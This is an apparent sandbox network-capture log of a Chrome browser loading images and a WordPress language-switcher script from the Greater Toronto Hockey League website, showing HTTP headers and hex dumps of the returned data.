                                                                                                                          2025-01-13 21:01:17 UTC647OUTGET /app/uploads/gthl/2024/08/29093926/icons8-rss-48-1.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC484INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 817
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Thu, 29 Aug 2024 13:39:27 GMT
                                                                                                                          ETag: "11c4233c46670a65187b0d2a340a2352"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 0f954bea3b233fb0b6e1981b1e8b6bd8.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: DmKLZDv-3lhLZ6-NHgGU2dHECt-wY6nMbaqAgtzCuNOrWbXHsjF-Tg==
                                                                                                                          2025-01-13 21:01:17 UTC817INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 02 e3 49 44 41 54 78 9c ed 99 cb 4b 54 71 14 c7 7f 11 18 58 8b 84 28 0a 7a 2c 6a 53 54 ab fe 85 ac 28 4a 09 97 b5 ab 4d 41 ad a3 70 1d 08 d1 6b 7e 99 65 8a 62 26 ad ca 47 09 be b2 97 59 2d d4 de 8b 50 7a 98 61 d6 4c 6a ea f8 89 e3 34 32 f7 ce ef 36 cd d8 bd 73 85 fb 85 b3 19 ce ef de f3 f9 9d 73 7e bf 33 33 4a 05 0a 14 28 90 af 45 48 ed 47 ab 0e 42 2a 82 56 78 62 21 15 21 a4 da d1 aa 70 6e c1 6b 75 c6 b3 a0 b5 23 4c c9 5c 76 3e bb c1 eb 59 88 82 4c 00 ee f9 08 a0 2d 13 00 ef 6a 5e a7 b4 70 fa 00 a6 07 89 a2 13 30 3e 0c 23 6f 61 e0 2e f4 9e 87 96 83 50 b5 c6 55 08 f5 df 00 fe a6 6f 2f a1 eb
                                                                                                                          Data Ascii: PNGIHDR00WpHYsIDATxKTqX(z,jST(JMApk~eb&GY-PzaLj426ss~33J(EHGB*Vxb!!pnku#L\v>YL-j^p0>#oa.PUo/


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          64192.168.11.204987254.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC444OUTGET /app/uploads/gthl/2025/01/06103844/DECA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 27788
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Mon, 06 Jan 2025 15:38:46 GMT
                                                                                                                          ETag: "23a35e3dc32ba6651058dc1bb5411c18"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 165ed32c12154887fba331169c8022ee.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: GeNvulE1ylPpy8e7DAIHjTlXHhrFRzD8srO7ZkvCAHNLRdvqQWq59g==
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 01 02 04 06 05 07 08 03 09 0a ff c4 00 5a 10 00 01 03 02 03 04 03 09 09 0b 07 0b 04 03 01 00 00 01 02 03 04 05 06 11 31 07 12 21 51 08 13 41 14 16 22 57 61 71 92 93 e1
                                                                                                                          Data Ascii: JFIF&&CC"Z1!QA"Waq
                                                                                                                          2025-01-13 21:01:17 UTC1161INData Raw: 72 26 7a fc 54 3a 8e 7b bd d6 a6 25 82 a6 e5 53 2c 6e d5 8f 95 ca 8b f2 66 63 c3 34 d4 f2 b6 68 25 74 72 31 73 6b 9a b9 2a 79 94 c5 4b 20 8c 30 53 c2 4a 5b 64 ef 7f 41 b1 8d f0 9b 56 be 90 d0 ce e9 52 b2 a7 17 17 06 f7 a9 2b 3d be c6 ba d1 ec 2f 7c 68 3f 9e c1 eb 10 e8 bd b8 dd 1b 53 71 a7 a5 8d e8 e6 ab 9c fe 0b c1 51 11 1a 9f bc eb df 7f ef 9f 9e 2b 3d 7b bf 89 8d 55 59 57 5a f4 92 b2 aa 59 dc d4 c9 16 47 ab 95 13 97 13 1e 5b a3 ff 00 00 ae ab 39 de dd 46 ce 97 78 51 5a 4d 96 4b 2f 85 07 0d 66 b6 de fb 99 e8 fd 93 5d 6d 9d e2 db 29 bd f0 a6 eb a1 8d c9 24 7d 6b 77 98 aa f7 65 9a 67 c0 dc 3d f1 a0 fe 7b 07 ac 43 c8 34 b7 0a ea 1d e4 a3 ac 9a 0d fc b7 ba b7 ab 73 f3 e4 7d 9d 7f be 7e 78 ac f5 ee fe 26 b6 27 46 1d 7a d2 aa aa 7c a6 de ee 93 ad 93 f8 64 59
                                                                                                                          Data Ascii: r&zT:{%S,nfc4h%tr1sk*yK 0SJ[dAVR+=/|h?SqQ+={UYWZYG[9FxQZMK/f]m)$}kweg={C4s}~x&'Fz|dY
                                                                                                                          2025-01-13 21:01:17 UTC9000INData Raw: 4b e5 70 95 af c3 a5 23 d0 3b 64 a9 a7 a8 c2 53 f5 13 c7 26 eb 57 3d d7 22 e5 c5 a6 9f b0 dc 73 05 b2 69 b0 b5 de ad 91 53 4c ab 35 2b e5 72 35 ad 93 f1 99 9a f3 d5 3c a9 e5 3a be 6b c5 da a2 27 43 51 73 aa 92 37 f0 73 1f 2b 95 17 ce 99 98 88 aa 8b 9a 2e 4a 86 fd 1c 96 30 c1 4b 07 52 57 bb bd fa 0f 31 98 f8 45 ad 5f 48 69 67 f8 4a 7a ae 31 d5 71 6f 64 96 db a7 e9 5e c7 b4 f6 15 55 c2 81 d4 b3 35 b5 b0 2a ac 6e 44 4e b1 39 1d 59 b2 db 85 0d 16 3a c4 d1 d6 56 41 03 a6 58 db 1a 49 22 35 5e a8 ab 9a 26 7a 9d 3d ef f5 f3 f3 c5 6f af 77 f1 31 fb ae af ba 7b b3 ba 65 ee 8c f7 ba dd f5 df cf 9e 7a 9a 98 7d 1e 74 69 54 a4 e7 f2 d7 47 43 b9 da cd 7c 2b c7 1f 8e c2 63 61 86 b3 a1 26 ec de f4 e2 e2 fe f3 d6 77 ca ea 29 6d 55 11 c7 57 0b 9c ad e0 88 f4 55 5e 28 74 16
                                                                                                                          Data Ascii: Kp#;dS&W="siSL5+r5<:k'CQs7s+.J0KRW1E_HigJz1qod^U5*nDN9Y:VAXI"5^&z=ow1{ez}tiTGC|+ca&w)mUWU^(t
                                                                                                                          2025-01-13 21:01:17 UTC1243INData Raw: c4 fd eb d8 9f 21 c5 d6 55 cf 5f 55 2d 65 4b b7 a4 95 db ce 53 e9 5f 56 ca 87 32 1a 76 ab 29 a0 4d d8 9a ba f9 5c be 55 d5 7e 6e c3 10 52 a5 18 bd 7b 59 bf b1 7f 9b cc 58 dc 65 4a 90 58 7d 77 28 ad ad b6 dd df 4e de 0b 72 f5 bd 97 b0 00 19 ce 7a 00 02 ac 90 55 75 2c 55 75 00 96 ea 42 ea 4b 75 21 75 21 92 00 01 96 00 02 a0 00 00 28 00 00 00 00 00 02 80 87 10 dd 49 71 0d d4 16 0e d4 82 5d a9 01 92 00 05 40 00 00 0a 96 2a 09 40 00 09 00 02 ac 00 01 00 15 71 62 ae 00 84 d4 2e a1 35 0b a8 00 96 ea 41 2d d4 86 49 60 01 52 c0 87 68 49 0e d0 02 a0 00 00 00 00 00 00 00 00 00 00 c1 6e ad fb 9d 66 e2 ee e9 9e 5c 0a 99 a9 e1 5a 97 fa af fd e6 11 7a b4 f5 35 6d c5 5c a4 27 af 7e a6 00 06 22 e1 55 57 8a ae 60 00 01 11 b3 ac 91 ac cf 2d e5 44 cc 9d 74 2d 14 72 f5 8d 54
                                                                                                                          Data Ascii: !U_U-eKS_V2v)M\U~nR{YXeJX}w(NrzUu,UuBKu!u!(Iq]@*@qb.5A-I`RhInf\Zz5m\'~"UW`-Dt-rT


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          65192.168.11.204987454.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC436OUTGET /app/uploads/gthl/2024/12/23150859/2025-GTHL-Playoffs-1600x900-Web-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 55635
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Mon, 23 Dec 2024 20:09:00 GMT
                                                                                                                          ETag: "7afc5f802a25b045e6029fed8ec78a9c"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 c57d1eb27f41d3e95fc5060845849c06.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: M1BkUUqaL59n-FYSfogbSM7RgqdKTiWo-GfOfnKaLX3FOoFB0_3WxQ==
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 00 08 09 ff c4 00 5e 10 00 01 03 03 02 03 05 04 07 03 08 04 09 09 05 09 01 02 03 04 00 05 11 06 21 07 12 31 08 13 41 51 61 14 22 71 81 15 23 32 42 52
                                                                                                                          Data Ascii: JFIF&&CC"^!1AQa"q#2BR
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 7a fa 75 a2 2a 35 75 ba 0b f2 62 4f 61 a0 87 16 b6 72 a2 d9 c6 e5 0b 48 fb 27 a1 39 15 33 85 8f 97 1b a4 c3 71 04 72 d3 fd 7e ea 96 f5 8c fe 95 3c 70 75 76 34 87 6c 1e df bb f5 df 61 b7 aa f9 b6 85 a9 a5 25 c4 1c 29 04 28 1f 22 2b db bd bb a1 a7 5a 70 16 c9 a8 9a 49 78 dd f4 7b ab 0a 3f 79 49 65 b7 92 7e 39 24 d7 88 2b de 7a c1 03 59 f6 2e e1 dc f7 54 1c 28 86 ab 6b 9f f3 4e 34 7f ff 00 58 ab 7c 3c fa 95 ec f5 1f d7 e6 b3 f8 fa 2b c6 8a 5f 47 11 f7 8b fd 17 c5 b8 fd e3 98 cb 88 4e 7c cd 5c f8 67 71 9f 69 bf 97 e3 4a 28 52 9a 20 f2 ee 08 f2 20 d5 6c 44 8f 1d e7 19 51 00 b4 b2 82 31 e4 71 4f 20 c9 5c 27 7b d8 4f 2d 0e 0f 14 8d eb d3 af 9a 2f 40 c0 e2 2a d3 84 5c e0 f3 0f f6 8c ec 7f c2 6a d1 6d bf da 2e d8 10 a6 21 4b ff 00 66 af 75 63 e4 6b cc 26 7d ed f3
                                                                                                                          Data Ascii: zu*5ubOarH'93qr~<puv4la%)("+ZpIx{?yIe~9$+zY.T(kN4X|<+_GN|\gqiJ(R lDQ1qO \'{O-/@*\jm.!Kfuck&}
                                                                                                                          2025-01-13 21:01:17 UTC1619INData Raw: 10 02 71 ab ee 33 5d b4 c8 b4 d9 d4 82 fb e8 2d ad ef ba 90 7a e3 cc d6 05 7a d2 b7 ab 59 2a 7a 37 3a 07 de 40 ad b4 c9 47 89 a2 b9 ec 6f a4 a1 d4 85 82 3a 11 9a e4 0e b5 90 5f 6e 02 bd 17 58 74 4c 60 cd 34 6f d7 fa d9 79 d1 c2 52 7a 10 45 49 da 75 55 de cc e0 54 79 2a 52 07 54 93 9a d3 6f 9a 1a cf 73 0a 53 2d 06 9c 3d 08 ac d6 ff 00 a4 6e 36 45 a9 5c 8a 5b 5f 88 0a eb 63 f5 08 72 76 e0 fb d7 1f 2f a4 64 62 0f 31 9e d3 7d 47 ea 15 f6 c9 c4 e8 b3 42 59 b8 0e ed 67 6c d5 ba 2d c6 3c d4 73 c7 74 28 78 62 bc f0 95 8e 6d c6 0d 59 74 b6 aa 91 66 98 80 e3 84 b2 48 07 27 a5 6b 31 de e1 63 8f 24 f0 e5 b9 46 5a 9b eb bd 2c 56 73 9a 8f 81 35 99 b1 d1 21 95 85 25 63 39 cd 3b e7 4f c6 a0 16 ae 77 45 73 3b e3 c6 9a 5c 1c 72 34 37 16 ca 79 9d 29 21 3f 1a 72 e3 be f6 d4
                                                                                                                          Data Ascii: q3]-zzY*z7:@Go:_nXtL`4oyRzEIuUTy*RTosS-=n6E\[_crv/db1}GBYgl-<st(xbmYtfH'k1c$FZ,Vs5!%c9;OwEs;\r47y)!?r
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: c2 50 41 0a 48 39 1e 35 73 b9 f1 4d 96 d0 e4 58 b1 90 e0 23 94 90 80 3f 5a cf 6e 77 27 6e 72 95 25 ec 64 f4 03 c0 55 0d 0e 2e b4 e4 d2 1b a4 72 ac 5c 3b 53 62 e4 f2 14 40 2a 6f 60 7c 6a fa b7 12 8f 95 63 51 a5 48 88 f2 64 46 71 4d b8 83 94 a9 3d 45 4c 8d 61 7f 50 c2 d6 85 8e 87 2d e3 3f 95 57 2c 25 ee b0 a7 0e 43 63 6e 92 b4 38 f7 17 8c e6 cb 07 60 70 45 3f e2 05 ce 34 5d 26 ec 47 dc 4f 7d 23 1c a9 07 7a ca dc bf dd dd 00 45 4a 99 3d 49 49 de 99 3f f4 a4 c5 85 cb 71 d7 0f 81 5a 89 a1 b0 6e 0f a2 4f c8 b0 42 43 38 ad 9b 41 71 06 c2 dd 8d 8b 7d ca 72 22 48 8c 39 30 e6 42 54 3c c1 ac 74 c3 7d 3b 28 81 f3 a1 11 5d 3b 05 1f ca ae 92 31 20 a2 a8 63 cb 0d 85 e9 98 7a 8a d1 35 95 3d 0e e9 19 e4 36 32 a2 87 01 c0 f5 a8 5b 8f 16 b4 a5 a8 2d b6 a5 2e 4b c9 cf ba d2
                                                                                                                          Data Ascii: PAH95sMX#?Znw'nr%dU.r\;Sb@*o`|jcQHdFqM=ELaP-?W,%Ccn8`pE?4]&GO}#zEJ=II?qZnOBC8Aq}r"H90BT<t};(];1 cz5=62[-.K
                                                                                                                          2025-01-13 21:01:17 UTC4864INData Raw: 64 9e a2 9f d4 9c 41 36 b2 07 10 28 22 b6 db 6d 20 36 d2 12 84 8d 82 52 30 05 1a bb 6f 3a ec 8a 4a 2b a8 7a 78 d1 79 a8 69 21 18 9f 2a 2d 75 75 14 85 d5 d5 d5 d4 d2 b4 04 64 53 59 4c 21 e4 14 2d 39 04 62 9d e4 79 d1 55 8a 38 42 ad 41 b3 0b 43 4a 6a 28 2a 6c ac ac 79 ee 69 ea 57 9c 67 6a 92 5f 26 76 4d 24 eb 1c e8 27 92 a6 1c 85 5a d5 4a 06 12 53 9e a6 a9 12 5d 4b 23 24 ee 2a e1 ab b9 c4 02 b4 ee 50 72 45 66 77 19 e5 69 db ad 63 c8 16 f5 d0 c6 3e c2 5a 4d d9 2d 93 ca aa 8b 7e ec 5e 38 cd 36 55 ae fb 34 15 c6 b5 cb 71 1e 69 69 44 1a 66 fc 4b 8c 23 fc ee 13 ec ff 00 6d b2 2a 9f 2d 59 e6 6e b4 7d 1c 9e 68 6a 79 47 1b f5 26 97 bd 6a f8 16 e0 a6 12 e8 5a fc 70 6b 38 b9 6b b7 a0 5b 53 68 b6 8e 55 91 f5 8b a8 6b 6d b2 e7 a8 5c 24 a9 6b cf 5d f0 28 6c 07 4e b7 1a
                                                                                                                          Data Ascii: dA6("m 6R0o:J+zxyi!*-uudSYL!-9byU8BACJj(*lyiWgj_&vM$'ZJS]K#$*PrEfwic>ZM-~^86U4qiiDfK#m*-Yn}hjyG&jZpk8k[ShUkm\$k](lN


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          66192.168.11.2049875137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC449OUTGET /app/plugins/sitepress-multilingual-cms/res/js/xdomain-data.js?ver=3.3.5 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:17 UTC519INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:17 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 2198
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961611621 961513532
                                                                                                                          Age: 83
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-896"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:17 UTC2198INData Raw: 2f 2a 67 6c 6f 62 61 6c 73 20 6a 51 75 65 72 79 2c 20 69 63 6c 5f 76 61 72 73 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 09 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 6a 51 75 65 72 79 28 27 23 6c 61 6e 67 5f 73 65 6c 20 61 2c 20 23 6c 61 6e 67 5f 73 65 6c 5f 66 6f 6f 74 65 72 20 61 2c 20 2e 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 6e 67 75 61 67 65 20 61 27 29 2e 6f 6e 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 76 65 6e 74 29 20 7b 0a 0a 09 09 09 76 61 72 20 6f 72 69 67 69 6e 61 6c 55 72 6c 3b 0a 09 09 09 76 61 72 20 63 75 72 72 65 6e 74 55 72 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e
                                                                                                                          Data Ascii: /*globals jQuery, icl_vars */(function () {"use strict";jQuery(document).ready(function () {jQuery('#lang_sel a, #lang_sel_footer a, .menu-item-language a').on('click', function (event) {var originalUrl;var currentUrl = window.location.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          67192.168.11.204987754.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC679OUTGET /app/uploads/gthl/2022/10/26123500/400X350-SAFE-SPORT-COMPLAINT-PROCESS-EN-320x280.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 20946
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Wed, 26 Oct 2022 16:35:01 GMT
                                                                                                                          ETag: "5f5d41fb32402384828fd1a13ef1e79d"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 2b74e5ee4d30afba8f9df9907896c5f4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: gt-yaYim01_JL620WNJQ51XLUJ9v9YbLAI4Dh4cX1GEp52qB55Pj8w==
                                                                                                                          2025-01-13 21:01:17 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff e1 03 8f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 39 63 63 63 34 64 65 39 33 2c 20 32 30 32 32 2f 30 33 2f 31 34 2d 31 34 3a 30 37 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20
                                                                                                                          Data Ascii: JFIFExifII*http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF
                                                                                                                          2025-01-13 21:01:17 UTC365INData Raw: ea 52 eb cb e8 42 33 c4 fa a9 15 97 bc b2 e6 72 85 29 4a 0b 2d 2d cb c4 ea 65 6d 43 67 02 d9 ee 5a b5 14 0e 6b c8 f3 7e 4f 0a c6 e6 ee ee 3a 3b 2b 65 d2 43 18 c9 e4 52 d1 5a 45 54 e9 1d 37 b5 9c fe e7 29 cf 66 3c 5b 9c b8 f1 24 a2 54 66 dd 52 5a 79 1d 0e 23 3c 0f aa b5 f2 58 7b 8f 56 b2 a9 29 d2 8c a6 b0 f1 bd 14 aa c2 69 26 6c 03 55 fb 81 ac 8d b5 e5 e2 35 d5 3c 97 13 c0 38 38 a4 fe f1 e9 a9 36 f3 c4 b0 72 5a d9 61 d3 5b 74 d1 e3 0f 97 79 d4 55 3c f3 03 96 7b a3 be 51 c7 d0 da fe 75 06 e3 b4 7a 36 a9 7a b3 f3 64 6d d4 2a 29 da a3 ed 0a 8c 0a 14 c1 f3 03 b2 83 03 03 b2 aa 30 74 57 73 20 c6 9b bb fd 34 7f 02 6a 6d af 65 9e 6d ae 9e b3 4f f4 ff 00 2c 89 76 d3 f2 a3 79 ff 00 3a 3f 84 56 1a fd a6 74 3a b3 ea 70 35 0e aa 8e 75 26 53 4d 69 ab 96 ac ba 22 d7 6a
                                                                                                                          Data Ascii: RB3r)J--emCgZk~O:;+eCRZET7)f<[$TfRZy#<X{V)i&lU5<886rZa[tyU<{Quz6zdm*)0tWs 4jmemO,vy:?Vt:p5u&SMi"j
